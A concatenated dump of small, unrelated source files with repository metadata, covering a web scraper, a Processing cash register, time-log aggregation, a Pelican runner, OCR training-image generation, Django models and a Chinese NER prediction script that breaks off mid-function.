# button 클릭
btn.click()
time.sleep(10)
driver.quit()
for i in range(10):
time.sleep(1) # 그냥 쉬어감
proTit = soup.select(“div.title-row > div:nth-child(1) > h5.proTit”)[i].string
proPrice = soup.select(“div.title-row > div:nth-child(2) > strong.proPrice”)[i].text
proDays = soup.select(“div.info-row > div:nth-child(1) > p:nth-child(1)“)[i].text
proDeparture = soup.select(“div.info-row > div:nth-child(1) > p:nth-child(2)“)[i].text
proScore = soup.select(“div.info-row > div:nth-child(2) > p:nth-child(1)“)[i].text
print(“제목: “, proTit)
print(“\n가격: “, proPrice)
print(“\n여행기간: “, proDays)
print(“\n출발날짜: “, proDeparture)
print(“\n점수: “, proScore)
print(“\n-------------------------------------------------------------------“) | [
"eaggo5@naver.com"
] | eaggo5@naver.com |
aba17ae60493775a1cbdd3dc41b31bb2ee9afbcd | 669e9241b02bdaa303fbc2fd4023b90d4d179a59 | /Cash Register/base.py | 272ceeded4ef34a761806bab212fe9e20d79a550 | [] | no_license | benjaminpotter/HatchProjects | 0854cf46ae7c3781468116a5d63b703dd54ae68c | 7f6a948d3474c755d071751b725c059e6c7f3553 | refs/heads/master | 2022-01-28T16:58:03.449073 | 2019-08-16T13:47:30 | 2019-08-16T13:47:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | def setup():
size(400, 400)
bg_color = color(120, 120, 120)
bills_and_coins = [100, 50, 20, 10, 5, 2, 1, 0.25, 0.10, 0.5]
def draw_cash_registerfunction():
noStroke()
fill(50, 50, 50)
rect(50, 50, 300, 220, 0)
fill(225, 225, 225)
rect(87, 130, 225, 35, 0)
fill(225, 225, 225)
rect(87, 210, 225, 35, 0)
fill(225, 225, 225)
textSize(20)
text("Cash Register", 135, 85)
textSize(14)
text("Cost", 90, 120)
text("Tendered", 90, 200)
def draw():
background(bg_color)
draw_cash_register()
noLoop()
cost = prompt("Input cost", "")
tendered = prompt("Input tendered amount", "")
change = Math.round((tendered - cost) / 0.05) * 0.05
fill(0, 0, 0)
text(cost, 95, 152)
text(tendered, 95, 232)
res = []
for i in range(0, 10):
count = 0;
while change >= bills_and_coins[i]:
count++
change -= bills_and_coins[i]
res.append(count)
answer = ""
for i in range (0, 10):
if res[i] > 0:
answer += res[i] + "x $" + bills_and_coins[i] + "\n"
text(answer, 70, 325)
| [
"noreply@github.com"
] | noreply@github.com |
aef53ad762073d48b7c956b671dae59d1218a131 | 7d598ef483ecd534f0ebbb3ceb1f0ddc8eb397c9 | /parser.py | f5ceb2d2fd5dcc9736002d31c36b0e99d090b384 | [] | no_license | EconClass/SL | f532659662f05a82d734a2bf347fe14cc74edbcf | 21aedf8ff3e956ef45601fc2f7415b80f91afa11 | refs/heads/master | 2021-05-20T21:29:06.748552 | 2020-04-02T10:28:47 | 2020-04-02T10:28:47 | 252,424,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | if __name__ == "__main__":
text = open('hi.txt')
for line in text:
broken = line.split()
parsed = open('parsed.txt', 'w')
parsed.write(" ".join((broken[1], broken[3]))
# parsed.close()
| [
"zurich.okoren@gmail.com"
] | zurich.okoren@gmail.com |
449af2f51fcf3f2f03a972bcee389a84c1928d64 | 53324bec216becbbae5cd5e6607d1323ac8938e3 | /tremodone.py | eb60b875a9c5abb7cc8a6095b039c9a713e7c923 | [
"MIT"
] | permissive | yellowsoar/tremodone | b09f0c736ab1ab3c06b215194e3fccafe9e51b0a | f09478dfa69ecf35c65059401613b34d03a949de | refs/heads/master | 2021-09-10T18:49:46.845549 | 2018-03-31T02:40:59 | 2018-03-31T02:40:59 | 114,984,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,746 | py | # -*- coding: utf-8 -*-
import csv
import codecs
import decimal
path_pomodone_log = 'pomodone-log.csv'
path_trello_archived = 'Archived trello.csv'
path_trello = 'trello.csv'
path_output = 'output.csv'
rfile_pomodone_log = codecs.open(path_pomodone_log, 'rb', encoding="utf-8")
rfile_trello_archived = codecs.open(
path_trello_archived, 'rb', encoding="big5")
rfile_trello = codecs.open(path_trello, 'rb', encoding="big5")
csv_pomodone_log = csv.DictReader(rfile_pomodone_log, delimiter=',')
csv_trello_archived = csv.DictReader(rfile_trello_archived, delimiter=',')
csv_trello = csv.DictReader(rfile_trello, delimiter=',')
write_output = codecs.open(path_output, 'w', encoding='utf-8')
dict_task = {} # name
dict_time = {} # time spent
dict_count = {} # excution times
dict_label = {} # labels
list_test = []
task_date = ""
task_date_temp = ""
count_date = 0
# read pomodone logs as dictionary
for temp in csv_pomodone_log:
task_id = temp['description'][temp['description'].find('c/') + 2:]
if task_date_temp == str(temp['date']):
pass
else:
task_date_temp = str(temp['date'])
count_date += 1
if len(task_id) == 0:
continue
task_time = (
int(temp['time spent'][:2]) * 60 * 60 +
int(temp['time spent'][3:5]) * 60 +
int(temp['time spent'][7:]))
# task id dictionary
try:
test = dict_task[task_id]
except KeyError:
dict_task[task_id] = task_id
# 時間
try:
test = dict_time[task_id]
task_time_temp = dict_time[task_id]
dict_time[task_id] = task_time_temp + task_time
except KeyError:
dict_time[task_id] = task_time
# 計數
if int(temp['time spent'][:2]) * 60 * 60 > 1500:
counter = 2
else:
counter = 1
try:
test = dict_time[task_id]
task_count_temp = dict_count[task_id]
dict_count[task_id] += counter
except KeyError:
dict_count[task_id] = counter
# 標籤
try:
test = dict_label[task_id]
except KeyError:
dict_label[task_id] = task_id
try:
list_test.index(task_id)
except ValueError:
list_test.append(task_id)
for temp in csv_trello_archived:
task_id = temp['Card URL'][temp['Card URL'].find('c/') + 2:]
if len(task_id) == 0:
continue
try:
test = dict_task[task_id]
task_title = temp['Title'][temp['Title'].find('] ') + 2:]
task_label = temp['Labels']
# 項目
dict_task[task_id] = task_title
dict_label[task_id] = task_label
except KeyError:
pass
for temp in csv_trello:
task_id = temp['Card URL'][temp['Card URL'].find('c/') + 2:]
try:
test = dict_task[task_id]
task_title = temp['Title']
task_label = temp['Labels']
# 項目
dict_task[task_id] = task_title
dict_label[task_id] = task_label
except KeyError:
pass
write_output.write('id,工項,總工時(秒),總工時(分),總工時(時),總工時(日),\
佔用工作日,總工作日佔比,執行次數,日均執行,標籤\n')
def wfile_output(task_id, task, time, count, labels):
write_output.write('"' + str(task_id) + '",') # id
write_output.write('"' + str(task) + '",') # 工項
write_output.write('"' + str(time) + '",') # 總工時(秒)
write_output.write('"' + str(decimal.Decimal(
time / 60).quantize(decimal.Decimal('0.01'))) + '",') # 總工時(分)
write_output.write('"' + str(
decimal.Decimal(time / 60 / 60).quantize(
decimal.Decimal('0.01'))) + '",') # 總工時(時)
write_output.write('"' + str(
decimal.Decimal(time / 60 / 60 / 24).quantize(
decimal.Decimal('0.01'))) + '",') # 總工時(日)
write_output.write('"' + str(decimal.Decimal(
time / 60 / time_avg_mins).quantize(
decimal.Decimal('0.01'))) + '",') # 佔用工作日
write_output.write('"' + str(decimal.Decimal(
time / 60 / time_avg_mins / count_date).quantize(
decimal.Decimal('0.0001'))) + '",') # 總工作日佔比
write_output.write('"' + str(count) + '",') # 執行次數
write_output.write('"' + str(
decimal.Decimal(count / count_date).quantize(
decimal.Decimal('0.01'))) + '",') # 日均執行
write_output.write('"' + str(labels) + '"\n') # 標籤
time_total_secs = 0
for temp in dict_task:
time_total_secs += dict_time[temp]
time_avg_mins = time_total_secs / 60 / count_date
time_avg_hours = time_total_secs / 60 / 60 / count_date
for temp in dict_task:
wfile_output(
temp,
dict_task[temp],
dict_time[temp],
dict_count[temp],
dict_label[temp])
| [
"yellowsoar@gmail.com"
] | yellowsoar@gmail.com |
93bc6d8993dfb57f569277ac860c68e7241e20c4 | 8bf1fbd200d945d48a10e3a046fd971420d8dbcd | /sorter.py | 86b114243d6ada4f41df7dba5c1d842e973702f9 | [] | no_license | o5prey/forming-train-and-test.txt-files-for-yolo-training | af869001db39bd71d73f27b81039ed9df4ddd499 | ff72d4dcbdd45cfe09f34b4b6064422121379403 | refs/heads/master | 2020-06-01T10:51:17.661722 | 2019-06-07T14:21:34 | 2019-06-07T14:21:34 | 190,755,165 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | #jpg sorter
import os
import glob
import sys
path='C:/Users/EMRE/Desktop/uav_dataset/' # resimlerin bulunduğu klasörün yolu, burayı değiştir C:/Users/EMRE/Desktop/pytorch-yolo-v3-master_env/imgs/
print(path)
files=os.listdir("C:/Users/EMRE/Desktop/uav_dataset/") # resimlerin bulunduğu klasörün yolu,burayı değiştir C:/Users/EMRE/Desktop/pytorch-yolo-v3-master_env/imgs/
print(len(files))
i=0
for filename in files:
src=path+files[i-0]
print(src)
dst=path+str(i+1)+'.jpg'
print(dst)
os.rename(src,dst)
i=i+1
#import os
#def main():
#i = 0
#for filename in os.listdir("xyz"):
# dst ="Hostel" + str(i) + ".jpg"
# src ='xyz'+ filename
# dst ='xyz'+ dst
# os.rename(src, dst)
# i += 1
#if __name__ == '__main__':
# main()
| [
"noreply@github.com"
] | noreply@github.com |
56adc44a220818826ab3e98736c808a4b246d7cb | f397db52cd2a0b6789c93887c581f68d48056fff | /Testscrape/viictr/viictr/spiders/viictrbot.py | 51a6da68d9d5a1966e3b4c0535cc81039287a564 | [] | no_license | rishitha957/Web-scraping | 8c2031c24bef6c3695116b6b3ed299d6467fb03d | 2a603b0e3a37df478fc6dc4d83bb04254cfab71a | refs/heads/master | 2020-05-25T20:33:48.013956 | 2019-06-07T07:28:47 | 2019-06-07T07:28:47 | 187,978,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,593 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 28 12:48:44 2019
@author: rishitha
"""
import scrapy
import selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.select import Select
from PIL import Image
import pytesseract
class ViictrbotSpider(scrapy.Spider):
name = 'viictrbot'
#allowed_domains = ['https://profiles.viictr.org/search/default.aspx?searchtype=people']
start_urls = ['https://profiles.viictr.org/search/']
def parse(self, response):
url1 = "https://profiles.viictr.org/search/default.aspx?searchtype=people&searchfor=&exactphrase=false&perpage=100&offset=0&page=81&totalpages=93&searchrequest=A81BSfTwU3GNm4liSODkW6vB3EBYO6gz+a5TY1bFhuz1tc7ngL4Orww3064KoquGaRdozjhWRGlrnur5IbaEcMH3TeE05jmp/c7agcYTrzG/rrN5T5p39rbdUtWdCA0xO6jz/+zNo8xTen6DVgqqi0W/y1wHaBbEaTD7d+ObAfEiPSt4sYkjfpHHCVWp3IgQjZuJYkjg5FtrbjF9BEDCXidTb5mQuzDHyB9Btw8xWu2KulNUp49QuXYgzDfXM/0XsMVgFPQNiicDoJOpif4f2tJz+lXwtXBUlbMMfLafD2/FQk/vlQFoQtTytKqtEzKxt8of3H04IOI=&sortby=&sortdirection=&showcolumns=1"
for i in range(1,94):
url = url1[:121]+str(i)+url1[123:]
yield scrapy.Request(url,callback=self.parse1)
def parse1(self,response):
link = response.xpath("//a[@class='listTableLink']/@href").extract()
for url in link:
yield scrapy.Request(url,callback=self.parse2)
def parse2(self,response):
list1 = []
name = response.css(".pageTitle span::text").extract()
list1.append(name)
title = response.css(".basicInfo tr:nth-child(1) span::text").extract()
list1.append(title)
institution = response.css("tr+ tr span::text").extract()
list1.append(institution)
dep1 = response.css("#ctl00_divProfilesContentMain tr:nth-child(3) td::text").extract()
department = []
for i in range(0,len(dep1),3):
department.append(dep1[i])
list1.append(department)
#email_l = response.css(".basicInfo img::attr(src)").extract()
#email = []
#for i in email_l:
#str1 = pytesseract.image_to_string(i,lang='eng')
#email.append(str1)
for i in range(len(name)):
yield{
'name':list1[0][i],
'title':list1[1][i],
'institution':list1[2][i],
'department':list1[3][i],
}
| [
"noreply@github.com"
] | noreply@github.com |
a23765fe96a6a43414cd28496a7065f7645e2f32 | 70042b2571b920da8864771c94296e6f6a895421 | /Repairs/models.py | 23b012ffd426937c6c423a464021f2890879cc18 | [] | no_license | hasalioma2/djangoNew | 83a596765092dfc09be9ca0c23bd80ea9b00bfee | 44cc769d7f7ebd15878b6f55c5071d0f4a5329ca | refs/heads/master | 2023-04-02T10:41:27.387909 | 2021-04-12T12:17:45 | 2021-04-12T12:17:45 | 357,124,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | from django.db import models
class Vendor(models.Model):
# VendorId = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200)
def __str__(self):
return self.name
class Assets(models.Model):
# assetId = models.IntegerField(primary_key=True)
model = models.CharField(max_length=200)
make = models.CharField(max_length=200)
description = models.CharField(max_length=200)
Value = models.IntegerField()
def __str__(self):
return self.description
class Delivery(models.Model):
# deliveryId = models.IntegerField(primary_key=True)
transDate = models.DateField('Date Dispatched')
staff = models.CharField(max_length=200)
toLocation=models.ForeignKey(Vendor, on_delete=models.CASCADE)
def __str__(self):
return str(self.id)
class AssetTrans(models.Model):
delivery=models.ForeignKey(Delivery, on_delete=models.CASCADE)
assetId= models.ForeignKey(Assets, on_delete=models.CASCADE)
qty = models.IntegerField(null=True, blank=True)
transDate = models.DateField('Date Dispatched')
shipped = models.BooleanField(default=False)
received = models.BooleanField(default=False)
| [
"“hasalioma@gmail.com”"
] | “hasalioma@gmail.com” |
8ebc06ef30a7723e5ccdac18c322c90c8fac7485 | dc9cef0a654ba5bf613501c0f11c110231aace18 | /easysteps/assign.py | afa552e6b99e0a85abdb5c6063de71be522fad1a | [] | no_license | mxt123/getstartpython | 36e297b9b20a9a7942e87f691f13c965c417ca7b | 70bf3f4775967449fc7590bbfa470fb6ff5c3b64 | refs/heads/master | 2021-01-10T19:03:08.035051 | 2019-01-20T16:29:58 | 2019-01-20T16:29:58 | 40,926,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | a = 8
b = 4
print('assign values:\t\t','a = ',a,'\tb =',b)
| [
"="
] | = |
4077f2c69b513dfbb09a6279cfbd85f564d84ab5 | 9f9ec8bebfe8b7ac8e60dcaa23153abe976585e6 | /dataCommons/postingAPI/tasks.py | 1ade94032b03b28ce48f6ba157446b40d942de40 | [] | no_license | erikwestra/data-commons | bbf32cd9b4b64ace28bcb049190d8272a23ed891 | e3ed33fad104157ff505bb02bc7ae981f8ba3b11 | refs/heads/master | 2020-04-11T12:03:19.996644 | 2013-02-14T17:08:24 | 2013-02-14T17:08:24 | 8,188,655 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | """ dataCommons.postingAPI.tasks
This module implements the background tasks run by the Celery task queuing
system.
"""
import logging
from celery import task
from dataCommons.shared.lib.decorators import print_exceptions_to_stdout
from dataCommons.postingAPI import postingProcessor
#############################################################################
logger = logging.getLogger(__name__)
#############################################################################
@task()
@print_exceptions_to_stdout
def process_postings(parsed_postings):
""" Process the given set of postings.
Note that we simply call the posting processor to do all the work, but
wrap it up in a Huey command so that the work is queued, and use the
'print_exceptions_to_stdout' decorator so that any exceptions will be
logged to stdout rather than written to the Huey log file (which won't
exist when the system is deployed to Heroku).
"""
postingProcessor.process_postings(parsed_postings)
| [
"ewestra@gmail.com"
] | ewestra@gmail.com |
84a8d7587333beacb530ca0dc5bd8c795e393d3a | 5cb29431ecbba7b61463c67749794b54201907e1 | /pelicide/runner.py | 688ba9e582ad94aeb3dcda92e73a6b397e49a1ed | [] | no_license | iksteen/pelicide | 6a9a88a1fe2df6acb271c465942820ab76ccfa82 | 5b8a6a919257840fafdcab5c886c81a72b18a6c0 | refs/heads/master | 2021-05-16T02:39:52.910803 | 2016-01-06T11:40:51 | 2016-01-06T11:40:51 | 34,100,676 | 16 | 2 | null | 2019-10-22T23:49:10 | 2015-04-17T06:35:34 | HTML | UTF-8 | Python | false | false | 2,958 | py | import json
import os
import sys
from twisted.internet import defer, protocol
class RunnerProtocol(protocol.ProcessProtocol):
def __init__(self, callback):
self.callback = callback
self.seq = 0
self.buffer = ''
self.pending = set()
def sendCommand(self, command, args=None):
self.seq += 1
self.pending.add(self.seq)
self.transport.write('%d %s %s\n' % (self.seq, command, json.dumps(args)))
return self.seq
def outReceived(self, data):
self.buffer += data
while '\n' in self.buffer:
response, self.buffer = self.buffer.split('\n', 1)
self.process_response(response)
def process_response(self, response):
seq, result, args = response.split(' ', 2)
seq = int(seq)
if seq in self.pending:
self.pending.remove(seq)
args = json.loads(args)
if self.callback is not None:
self.callback(seq, result == '+', args)
def processExited(self, reason):
pending, self.pending = self.pending, set()
while pending:
self.callback(pending.pop(), False, reason)
class Runner(object):
def __init__(self, python, config_path, settings, **kwargs):
reactor = kwargs.get('reactor')
if reactor is None:
from twisted.internet import reactor
self.reactor = reactor
self.python = python
self.config_path = config_path
self.init_settings = settings
self.settings = None
self.d = None
self.pending = {}
def start(self):
self.d = defer.Deferred()
runner = os.path.join(os.path.dirname(__file__), 'pelican-runner.py')
protocol = RunnerProtocol(self.responseReceived)
self.transport = self.reactor.spawnProcess(
protocol,
self.python,
[
self.python,
runner,
self.config_path,
json.dumps(self.init_settings),
],
env=None,
childFDs={
0: 'w',
1: 'r',
2: sys.stderr.fileno(),
},
)
return self.d
def restart(self):
return self.command('quit').addCallback(lambda _: self.start())
def command(self, command, args=None):
if self.transport.proto is None:
self.start()
command_id = self.transport.proto.sendCommand(command, args)
d = defer.Deferred()
self.pending[command_id] = d
return d
def responseReceived(self, command_seq, success, args):
if command_seq == 0:
self.settings = args
if self.d:
self.d.callback(args)
self.d = None
return
d = self.pending.pop(command_seq)
if success:
d.callback(args)
else:
d.errback(RuntimeError(args))
| [
"iksteen@gmail.com"
] | iksteen@gmail.com |
91f97b42b730af6c6b6353f404a643529440cf94 | 864bb85e9f5b86843e630d2b7b6291715385e367 | /hdf5/synthetic/1_toy_syn.py | 24872d29f105cbf4c71daa84c56baf66026383f0 | [] | no_license | Littlehead27/Keras_text_recognition_ocr | 2ec2760170e80a667ce07f5ac5948f66be1eb896 | f46faf3e7e8e7b21d6cb8b8885e04b2c734a7e16 | refs/heads/master | 2020-07-21T21:53:37.215891 | 2019-05-17T08:02:51 | 2019-05-17T08:02:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,524 | py | # -*- coding:utf8 -*-
"""
功能:将语料中的每行文本绘制成图像
输入:语料文件
输出:文本图像
参数:在config.cfg.py中: config_path, corpus, dict, FONT_PATH
"""
import codecs
import numpy as np
import mycrnn_pc.config.cfg as cfg
import os
from PIL import Image, ImageDraw, ImageFont
import progressbar
import glob
def add_noise(raw_img):
"""
:param img_path: 图像路径
:return: 加噪后的图像ndarray
"""
h = raw_img.shape[0]
w = raw_img.shape[1]
factor = np.random.randint(100, 6500)* 0.1
scale = np.random.randint(1, 50) * 0.1
noise = np.random.rayleigh(scale, (h, w))
noise = noise / noise.max() * factor # 控制分布的灰度范围
noisy = raw_img.copy() + noise
noisy = noisy / noisy.max() * 255
return noisy
class TextGenerator():
def __init__(self, input_shape, save_path):
"""初始化参数来自config文件
"""
self.img_h = input_shape[0]
self.img_w = input_shape[1]
self.depth = input_shape[2]
# 语料参数
self.max_row_len = cfg.max_row_len
self.max_label_len = cfg.max_label_len # CTC最大输入长度
self.n_samples = cfg.n_samples
self.dictfile = cfg.dict # 字典
self.dict = []
self.corpus_file = cfg.corpus # 语料集
self.save_path = save_path
# 加载字体文件
self.font_factor = 1 # 控制字体大小
# 加载字体文件
self.load_fonts()
# 加载语料集
self.build_dict()
self.build_train_list(self.n_samples, self.max_row_len)
def load_fonts(self):
""" 加载字体文件并设定字体大小
TODO: 无需设定字体大小,交给pillow
:return: self.fonts
"""
self.fonts = {} # 所有字体
self.font_name = [] # 字体名,用于索引self.fonts
# 字体完整路径
font_path = os.path.join(cfg.FONT_PATH, "*.*")
# 获取全部字体路径,存成list
fonts = list(glob.glob(font_path))
# 遍历字体文件
for each in fonts:
# 字体大小
fonts_list = {} # 每一种字体的不同大小
font_name = each.split('\\')[-1].split('.')[0] # 字体名
self.font_name.append(font_name)
font_size = 25
for j in range(0, 10): # 当前字体的不同大小
# 调整字体大小
cur_font = ImageFont.truetype(each, font_size, 0)
fonts_list[str(j)] = cur_font
font_size -= 1
self.fonts[font_name] = fonts_list
def build_dict(self):
""" 打开字典,加载全部字符到list
每行是一个字
:return: self.dict
"""
with codecs.open(self.dictfile, mode='r', encoding='utf-8') as f:
# 按行读取语料
for line in f:
# 当前行单词去除结尾
word = line.strip('\r\n')
# 只要没超出上限就继续添加单词
self.dict.append(word)
# 最后一类作为空白占位符
self.blank_label = len(self.dict)
def mapping_list(self):
# 写图像文件名和类别序列的对照表
file_path = os.path.join(cfg.DATASET_DIR, 'map_list.txt')
with codecs.open(file_path, mode='w', encoding='utf-8') as f:
for i in range(len(self.train_list)):
# 文件名, 类别ID序列, 类别长度, 类别字符序列
label_sequence = self.label_sequence[i].tolist()
f.write("{}.png,{}\n".format(
i, ' '.join(str(e) for e in label_sequence)))
def build_train_list(self, n_samples, max_row_len=None):
# 过滤语料,留下适合的内容组成训练list
print('正在加载语料...')
assert max_row_len <= self.max_label_len # 最大类别序列长度
self.n_samples = n_samples # 语料总行数
sentence_list = [] # 存放每行句子
self.train_list = []
self.label_len = [0] * self.n_samples # 类别序列长度
self.label_sequence = np.ones([self.n_samples, self.max_label_len]) * -1 # 类别ID序列
with codecs.open(self.corpus_file, mode='r', encoding='utf-8') as f:
# 按行读取语料
for sentence in f:
sentence = sentence.strip() # 去除行末回车
if len(sentence_list) < n_samples:
# 只要长度和数量没超出上限就继续添加单词
sentence_list.append(sentence)
np.random.shuffle(sentence_list) # 打乱语料
if len(sentence_list) < self.n_samples:
raise IOError('语料不足')
# 遍历语料中的每一句(行)
for i, sentence in enumerate(sentence_list):
# 每个句子的长度
label_len = len(sentence)
filted_sentence = ''
# 将单词分成字符,然后找到每个字符对应的整数ID list
# n_samples个样本每个一行max_row_len元向量(单词最大长度),每一元为该字符的整数ID
label_sequence = []
for j, word in enumerate(sentence):
index = self.dict.index(word)
label_sequence.append(index)
filted_sentence += word
if filted_sentence is not '':
# 当前样本的类别序列及其长度
self.label_len[i] = label_len
self.label_sequence[i, 0:self.label_len[i]] = label_sequence
else: # 单独处理空白样本
self.label_len[i] = 1
self.label_sequence[i, 0:self.label_len[i]] = self.blank_label # 空白符
self.label_sequence = self.label_sequence.astype('int')
self.train_list = sentence_list # 过滤后的训练集
self.mapping_list() # 保存图片名和类别序列的 map list
def paint_text(self, text, i):
""" 使用PIL绘制文本图像,传入画布尺寸,返回文本图像
:param h: 画布高度
:param w: 画布宽度
:return: img
"""
# 创建画布
canvas = Image.new('RGB', (self.img_w, self.img_h), (255, 255, 255))
draw = ImageDraw.Draw(canvas)
# 自动调整字体大小避免超出边界, 至少留白水平10%
valid_fonts = {}
np.random.shuffle(self.font_name)
cur_fonts = self.fonts.get(self.font_name[0])
# 文本区域上限
limit = [self.img_w - 4, self.img_h - 4]
try:
for each in cur_fonts:
text_size = cur_fonts[each].getsize(text) # fixme 慢在这儿了
if (text_size[0] < limit[0]) and (text_size[1] < limit[1]):
# 找到不超出边界的所有字体
valid_fonts[each] = cur_fonts.get(each)
except:
ValueError('字体太大')
# print('寻找字体用时{}s'.format(end - start))
# np.random.shuffle(valid_fonts)
keys = list(valid_fonts.keys())
np.random.shuffle(keys)
font = valid_fonts.get(keys[0])
text_size = font.getsize(text)
assert text_size[0] < self.img_w - 4
assert text_size[1] < self.img_h - 4
# 随机平移
horizontal_space = self.img_w - text_size[0]
vertical_space = self.img_h - text_size[1]
start_x = np.random.randint(2, horizontal_space-2)
start_y = np.random.randint(2, vertical_space-2)
# 绘制当前文本行
draw.text((start_x, start_y), text, font=font, fill=(0, 0, 0, 255))
img_array = np.array(canvas)
if self.depth == 1:
# 取单通道
grayscale = img_array[:, :, 0] # [32, 256, 4]
# grayscale = add_noise(grayscale)
ndimg = Image.fromarray(grayscale).convert('L')
# ndimg.show()
# 保存
save_path = os.path.join(self.save_path, '{}.png'.format(i)) # 类别序列即文件名
ndimg.save(save_path)
else:
img = img_array
# todo 数据增强
# 画图看一下
ndimg = Image.fromarray(img).convert('RGB')
# ndimg.show()
# 保存
save_path = os.path.join(self.save_path, '{}.png'.format(i)) # 类别序列即文件名
ndimg.save(save_path)
def generator(self):
n_samples = len(self.train_list)
# 进度条
widgets = ["数据集创建中: ", progressbar.Percentage(), " ", progressbar.Bar(), " ", progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=n_samples, widgets=widgets).start()
for i in range(n_samples):
# 绘制当前文本
self.paint_text(self.train_list[i], i)
pbar.update(i)
pbar.finish()
if __name__ == '__main__':
np.random.seed(0) # 决定训练集的打乱情况
# 输出路径
if not os.path.exists(cfg.DATASET_DIR):
os.makedirs(cfg.DATASET_DIR)
img_h = 32
img_w = 128
depth = 1
# 通道顺序, channel_last
input_shape = (img_h, img_w, depth)
# 实例化图像生成器
if not os.path.exists(cfg.DATASET_DIR):
os.makedirs(cfg.DATASET_DIR)
img_gen = TextGenerator(input_shape=input_shape, save_path=cfg.DATASET_DIR)
img_gen.generator()
| [
"dumdumslug@hotmail.com"
] | dumdumslug@hotmail.com |
9b95da6467ddd3c456cc5ff5baf0598155c35fea | 09628ca7c25625fb4776e243590298d387f6912f | /backjoon/math2_4.py | 04ad9b5e71dea83bb61e0885ccbef38a5c532e36 | [] | no_license | ssolssolham/ssolssolham | 89b23b0c577fcc67cd3d8a3eb6a8f686c0ae818b | 3d591ca07480ac34fbdd3c1a3d6dec40feef617d | refs/heads/master | 2021-06-12T16:22:32.387195 | 2020-01-14T15:13:52 | 2020-01-14T15:13:52 | 148,002,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | import sys
# 에라토스테네스 체 4
ipt = -1
ipts = []
max = 0
while ipt != 0:
ipt = int(sys.stdin.readline().rstrip())
ipts.append(ipt)
if max < ipt:
max = ipt
double_max = 2 * max
a = [False,False] + [True] * (double_max - 1)
primes = []
for i in range(2, double_max + 1):
if a[i]:
primes.append(i)
for j in range(2*i, double_max+1, i):
a[j] = False
ipts.pop()
for i in ipts:
sum = 0
for j in range(i + 1, 2*i + 1):
if a[j]:
sum += 1
print(sum)
| [
"paskal1234@naver.com"
] | paskal1234@naver.com |
0c3ba85209268e4419995bf3b0e59c8dc4ee5a21 | 1a4bc1a11fdb3f714f22f5e0e826b47aa0569de2 | /projects/project02/tests/q1_1.py | 61dd4039d3bf8affab16b12c4665cbd175e3a540 | [] | no_license | taylorgibson/ma4110-fa21 | 201af7a044fd7d99140c68c48817306c18479610 | a306e1b6e7516def7de968781f6c8c21deebeaf5 | refs/heads/main | 2023-09-05T21:31:44.259079 | 2021-11-18T17:42:15 | 2021-11-18T17:42:15 | 395,439,687 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | test = { 'name': 'q1_1',
'points': None,
'suites': [{'cases': [{'code': '>>> type(all_unique_causes) in [np.ndarray, list]\nTrue', 'hidden': False, 'locked': False}], 'scored': True, 'setup': '', 'teardown': '', 'type': 'doctest'}]}
| [
"taylorgibson@gmail.com"
] | taylorgibson@gmail.com |
4824a2ce716332ac9003208ee8e5242619b3e1e8 | fb8f496a0ea0a416a5ee214ca308953392fb08ff | /predict.py | cf0c635b320c85db397e915d78c9e0d26067baed | [] | no_license | Noba1anc3/CH-NER | 32ba6138d4344052844698ee917a5910997ec3ed | 82f3ab07b2bf7a5b7a4debe6c074c9801b8f2fcf | refs/heads/master | 2023-04-05T05:52:29.132299 | 2020-04-05T10:10:36 | 2020-04-05T10:10:36 | 252,642,674 | 2 | 0 | null | 2023-03-24T23:27:38 | 2020-04-03T05:43:07 | HTML | UTF-8 | Python | false | false | 9,658 | py | import numpy as np
import tensorflow as tf
from tensorflow.contrib.crf import viterbi_decode
from copy import deepcopy
import re
from model import BiLSTM_CRF
from utils import train_utils
from data_process import read_dictionary
import utils.config as cf
# 参数部分
params = cf.ConfigPredict('predict', 'config/params.conf')
params.load_config()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = 0.3
def predict_one_batch(model, ses, seqs):
"""
Created by jty
预测引擎,输入句子id和保存好的模型参数进行预测,输出标签id
:param ses: 使用会话
:param seqs: 句子id
:return: label_list seq_len_list 标签id 句子id
"""
feed_dict, seq_len_list = train_utils.get_feed_dict(model, seqs, drop_keep=1.0)
# transition_params代表转移概率,由crf_log_likelihood方法计算出
log_its, transition_params = ses.run([model.log_its, model.transition_params],
feed_dict=feed_dict)
label_list = []
# 默认使用CRF
for log_it, seq_len in zip(log_its, seq_len_list):
vtb_seq, _ = viterbi_decode(log_it[:seq_len], transition_params)
label_list.append(vtb_seq)
return label_list, seq_len_list
def demo_one(model, ses, sent, batch_size, vocab, shuffle, tag2label):
"""
Created by jty
输入句子,得到预测标签id,并转化为label
:param model: 保存好的模型
:param ses: 使用会话
:param sent: 输入要进行实体抽取的句子
:param batch_size: 每次预测的句子数
:param vocab: word2id
:param shuffle: 默认为False
:return: tag 预测标签
"""
# batch_yield就是把输入的句子每个字的id返回,以及每个标签转化为对应的tag2label的值
label_list = []
for seqs, labels in train_utils.batch_yield(sent, batch_size, vocab, tag2label, shuffle):
label_list_, _ = predict_one_batch(model, ses, seqs)
label_list.extend(label_list_)
label2tag = {}
for tag, label in tag2label.items():
label2tag[label] = tag if label != 0 else label
tag = [label2tag[label] for label in label_list[0]]
return tag
"""
Created by jty
数据后处理
根据输入的tag和句子返回对应的字符
其中包括抽取出对应的人名、地名、组织名
"""
def get_entity(tag_seq, char_seq):
PER = get_PER_entity(tag_seq, char_seq)
LOC = get_LOC_entity(tag_seq, char_seq)
ORG = get_ORG_entity(tag_seq, char_seq)
